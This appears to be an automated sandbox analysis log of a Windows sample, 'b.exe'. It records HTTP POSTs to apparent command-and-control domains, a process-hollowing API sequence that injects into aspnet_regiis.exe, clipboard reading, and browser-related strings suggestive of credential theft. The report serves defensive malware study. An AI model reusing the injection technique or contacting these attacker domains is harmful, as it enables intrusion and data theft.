            Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 121Host: frogs-severz.sbs
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficDNS traffic detected: DNS query: revirepart.biz
            Source: global trafficDNS traffic detected: DNS query: frogs-severz.sbs
            Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: revirepart.biz
            Source: aspnet_regiis.exe, 00000002.00000003.1826876989.0000000004DDC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
            Source: aspnet_regiis.exe, 00000002.00000003.1826876989.0000000004DDC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
            Source: aspnet_regiis.exe, 00000002.00000003.1826876989.0000000004DDC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
            Source: aspnet_regiis.exe, 00000002.00000003.1826876989.0000000004DDC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
            Source: aspnet_regiis.exe, 00000002.00000003.1826876989.0000000004DDC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
            Source: aspnet_regiis.exe, 00000002.00000003.1826876989.0000000004DDC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
            Source: aspnet_regiis.exe, 00000002.00000003.1826876989.0000000004DDC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
            Source: aspnet_regiis.exe, 00000002.00000003.1826876989.0000000004DDC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
            Source: aspnet_regiis.exe, 00000002.00000003.1826876989.0000000004DDC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
            Source: Amcache.hve.5.drString found in binary or memory: http://upx.sf.net
            Source: aspnet_regiis.exe, 00000002.00000003.1826876989.0000000004DDC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
            Source: aspnet_regiis.exe, 00000002.00000003.1826876989.0000000004DDC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
            Source: aspnet_regiis.exe, 00000002.00000003.1772346046.0000000004DEA000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1772515435.0000000004DE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: aspnet_regiis.exe, 00000002.00000003.1772346046.0000000004DEA000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1772515435.0000000004DE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: aspnet_regiis.exe, 00000002.00000003.1772346046.0000000004DEA000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1772515435.0000000004DE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: aspnet_regiis.exe, 00000002.00000003.1772346046.0000000004DEA000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1772515435.0000000004DE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: aspnet_regiis.exe, 00000002.00000003.1772346046.0000000004DEA000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1772515435.0000000004DE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: aspnet_regiis.exe, 00000002.00000003.1772346046.0000000004DEA000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1772515435.0000000004DE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: aspnet_regiis.exe, 00000002.00000003.1772346046.0000000004DEA000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1772515435.0000000004DE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: aspnet_regiis.exe, 00000002.00000002.1925207846.0000000002927000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1804693049.0000000004DA6000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1804839414.0000000004DA7000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1770809655.0000000002937000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1904340370.0000000002927000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1804566888.0000000004DA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://frogs-severz.sbs/
            Source: aspnet_regiis.exe, 00000002.00000003.1904374794.0000000004DA9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1850397648.0000000004DAA000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1877041878.0000000004DA5000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1925594302.0000000004DA9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1924472463.0000000004DA9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1850064966.0000000004DA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://frogs-severz.sbs/.
            Source: aspnet_regiis.exe, 00000002.00000003.1904374794.0000000004DA9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1877041878.0000000004DA5000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1925594302.0000000004DA9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1924472463.0000000004DA9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://frogs-severz.sbs/J
            Source: aspnet_regiis.exe, aspnet_regiis.exe, 00000002.00000002.1925078989.00000000028CB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1924361265.00000000028CB000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1925302467.000000000294F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1876536133.000000000294F000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1826478661.0000000002947000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1826429538.0000000002943000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1850347979.0000000002943000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1771257369.0000000002910000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1850417159.0000000002947000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://frogs-severz.sbs/api
            Source: aspnet_regiis.exe, 00000002.00000003.1876536133.000000000294F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://frogs-severz.sbs/api$
            Source: aspnet_regiis.exe, 00000002.00000002.1925302467.000000000294F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://frogs-severz.sbs/api8
            Source: aspnet_regiis.exe, 00000002.00000003.1904374794.0000000004DA9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://frogs-severz.sbs/api;
            Source: aspnet_regiis.exe, 00000002.00000002.1925302467.000000000294F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://frogs-severz.sbs/apibu
            Source: aspnet_regiis.exe, 00000002.00000003.1826478661.0000000002947000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1826429538.0000000002943000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://frogs-severz.sbs/apie
            Source: aspnet_regiis.exe, 00000002.00000003.1904374794.0000000004DA9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1826659361.0000000004DA8000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1850397648.0000000004DAA000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1877041878.0000000004DA5000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1925594302.0000000004DA9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1924472463.0000000004DA9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1827760791.0000000004DA8000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1850064966.0000000004DA6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://frogs-severz.sbs/pp
            Source: aspnet_regiis.exe, 00000002.00000003.1924361265.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1925078989.00000000028B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://frogs-severz.sbs:443/api
            Source: aspnet_regiis.exe, 00000002.00000003.1924361265.00000000028B2000.00000004.00000020.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000002.1925078989.00000000028B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://frogs-severz.sbs:443/apicuriz
            Source: aspnet_regiis.exe, 00000002.00000003.1726420977.00000000028E6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://revirepart.biz/
            Source: aspnet_regiis.exe, 00000002.00000003.1773452170.0000000004E44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.microsof
            Source: aspnet_regiis.exe, 00000002.00000003.1827823872.0000000004EC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
            Source: aspnet_regiis.exe, 00000002.00000003.1827823872.0000000004EC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
            Source: aspnet_regiis.exe, 00000002.00000003.1773452170.0000000004E42000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1804527241.0000000004DF6000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1773613824.0000000004DF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
            Source: aspnet_regiis.exe, 00000002.00000003.1773613824.0000000004DD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
            Source: aspnet_regiis.exe, 00000002.00000003.1773452170.0000000004E42000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1804527241.0000000004DF6000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1773613824.0000000004DF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
            Source: aspnet_regiis.exe, 00000002.00000003.1773613824.0000000004DD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
            Source: aspnet_regiis.exe, 00000002.00000003.1772346046.0000000004DEA000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1772515435.0000000004DE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: aspnet_regiis.exe, 00000002.00000003.1772346046.0000000004DEA000.00000004.00000800.00020000.00000000.sdmp, aspnet_regiis.exe, 00000002.00000003.1772515435.0000000004DE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: aspnet_regiis.exe, 00000002.00000003.1827823872.0000000004EC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
            Source: aspnet_regiis.exe, 00000002.00000003.1827823872.0000000004EC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
            Source: aspnet_regiis.exe, 00000002.00000003.1827823872.0000000004EC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
            Source: aspnet_regiis.exe, 00000002.00000003.1827823872.0000000004EC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
            Source: aspnet_regiis.exe, 00000002.00000003.1827823872.0000000004EC5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
            Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
            Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
            Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
            Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
            Source: unknownHTTPS traffic detected: 104.21.43.198:443 -> 192.168.2.4:49730 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.88.250:443 -> 192.168.2.4:49732 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.88.250:443 -> 192.168.2.4:49734 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.88.250:443 -> 192.168.2.4:49737 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.88.250:443 -> 192.168.2.4:49740 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.88.250:443 -> 192.168.2.4:49742 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.88.250:443 -> 192.168.2.4:49744 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.88.250:443 -> 192.168.2.4:49747 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 104.21.88.250:443 -> 192.168.2.4:49749 version: TLS 1.2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_02475300 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,2_2_02475300
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_02475300 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,2_2_02475300

            System Summary

            barindex
            Source: b.exeStatic PE information: section name: m@ka
            Source: b.exeStatic PE information: section name:
            Source: C:\Users\user\Desktop\b.exeCode function: 0_2_6CDD88C0 WindowsHandle,GetConsoleWindow,ShowWindow,VirtualAlloc,CreateProcessW,NtGetContextThread,NtAllocateVirtualMemory,NtAllocateVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,NtReadVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,NtCreateThreadEx,NtSetContextThread,NtResumeThread,CloseHandle,CloseHandle,GetConsoleWindow,ShowWindow,VirtualAlloc,NtGetContextThread,CloseHandle,CreateProcessW,NtWriteVirtualMemory,NtWriteVirtualMemory,CloseHandle,0_2_6CDD88C0
            Source: C:\Users\user\Desktop\b.exeCode function: 0_2_6CDD6E40 GetModuleHandleW,NtQueryInformationProcess,GetModuleHandleW,0_2_6CDD6E40
            Source: C:\Users\user\Desktop\b.exeCode function: 0_2_008BBC800_2_008BBC80
            Source: C:\Users\user\Desktop\b.exeCode function: 0_2_008A30900_2_008A3090
            Source: C:\Users\user\Desktop\b.exeCode function: 0_2_008A24300_2_008A2430
            Source: C:\Users\user\Desktop\b.exeCode function: 0_2_008A41A00_2_008A41A0
            Source: C:\Users\user\Desktop\b.exeCode function: 0_2_008BC5A00_2_008BC5A0
            Source: C:\Users\user\Desktop\b.exeCode function: 0_2_008BC9200_2_008BC920
            Source: C:\Users\user\Desktop\b.exeCode function: 0_2_008BF5500_2_008BF550
            Source: C:\Users\user\Desktop\b.exeCode function: 0_2_6CDD88C00_2_6CDD88C0
            Source: C:\Users\user\Desktop\b.exeCode function: 0_2_6CDD6E400_2_6CDD6E40
            Source: C:\Users\user\Desktop\b.exeCode function: 0_2_6CDD12100_2_6CDD1210
            Source: C:\Users\user\Desktop\b.exeCode function: 0_2_6CDDFCB00_2_6CDDFCB0
            Source: C:\Users\user\Desktop\b.exeCode function: 0_2_6CDD48100_2_6CDD4810
            Source: C:\Users\user\Desktop\b.exeCode function: 0_2_6CDEA6210_2_6CDEA621
            Source: C:\Users\user\Desktop\b.exeCode function: 0_2_6CDD7FE00_2_6CDD7FE0
            Source: C:\Users\user\Desktop\b.exeCode function: 0_2_008BDA100_2_008BDA10
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0247D2602_2_0247D260
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_02449AE02_2_02449AE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0247AAE02_2_0247AAE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0246F3ED2_2_0246F3ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0246E3982_2_0246E398
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_024690602_2_02469060
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_024648602_2_02464860
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_024590D02_2_024590D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_024621102_2_02462110
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_024666182_2_02466618
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0247A7602_2_0247A760
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_02482C402_2_02482C40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_02448C702_2_02448C70
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0245A4DA2_2_0245A4DA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0244AD502_2_0244AD50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_024835802_2_02483580
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_02465A4A2_2_02465A4A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_024612502_2_02461250
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_024832602_2_02483260
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_024462002_2_02446200
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_02444A312_2_02444A31
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0247DAC02_2_0247DAC0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0247E2D02_2_0247E2D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0245E2F02_2_0245E2F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_024732F02_2_024732F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0244B2802_2_0244B280
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_02478B4C2_2_02478B4C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_024623602_2_02462360
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_02442B702_2_02442B70
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0245EFF52_2_0245EFF5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0245BB102_2_0245BB10
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0245FB202_2_0245FB20
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_02466BD02_2_02466BD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_02471BE82_2_02471BE8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_02445BF02_2_02445BF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0245EBF02_2_0245EBF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_024813A02_2_024813A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_024818602_2_02481860
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_024478702_2_02447870
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_024638152_2_02463815
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0246A0D52_2_0246A0D5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0245E0E82_2_0245E0E8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_024750F02_2_024750F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0246B0FA2_2_0246B0FA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0247B0A02_2_0247B0A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0247A0A02_2_0247A0A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_024468B02_2_024468B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0246C14A2_2_0246C14A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_024819302_2_02481930
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_024729C62_2_024729C6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0245FF7F2_2_0245FF7F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_02479E402_2_02479E40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_02448E502_2_02448E50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0244CE522_2_0244CE52
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_02466E002_2_02466E00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_024726152_2_02472615
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0245F6E02_2_0245F6E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_024696F42_2_024696F4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_024496A02_2_024496A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_02482F402_2_02482F40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_02466F702_2_02466F70
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0245FF7F2_2_0245FF7F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_02444F052_2_02444F05
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0247D7102_2_0247D710
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0245C7C92_2_0245C7C9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_024687D02_2_024687D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0244E7D92_2_0244E7D9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0245EFF52_2_0245EFF5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0246EF872_2_0246EF87
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0245BFB62_2_0245BFB6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0246E7BB2_2_0246E7BB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_024654102_2_02465410
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_02470C1C2_2_02470C1C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_02460C902_2_02460C90
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0246FD652_2_0246FD65
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_02446D602_2_02446D60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_024435702_2_02443570
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_024695202_2_02469520
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_024605F02_2_024605F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_024455F82_2_024455F8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0246B5882_2_0246B588
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exeCode function: 2_2_0245B5A12_2_0245B5A1
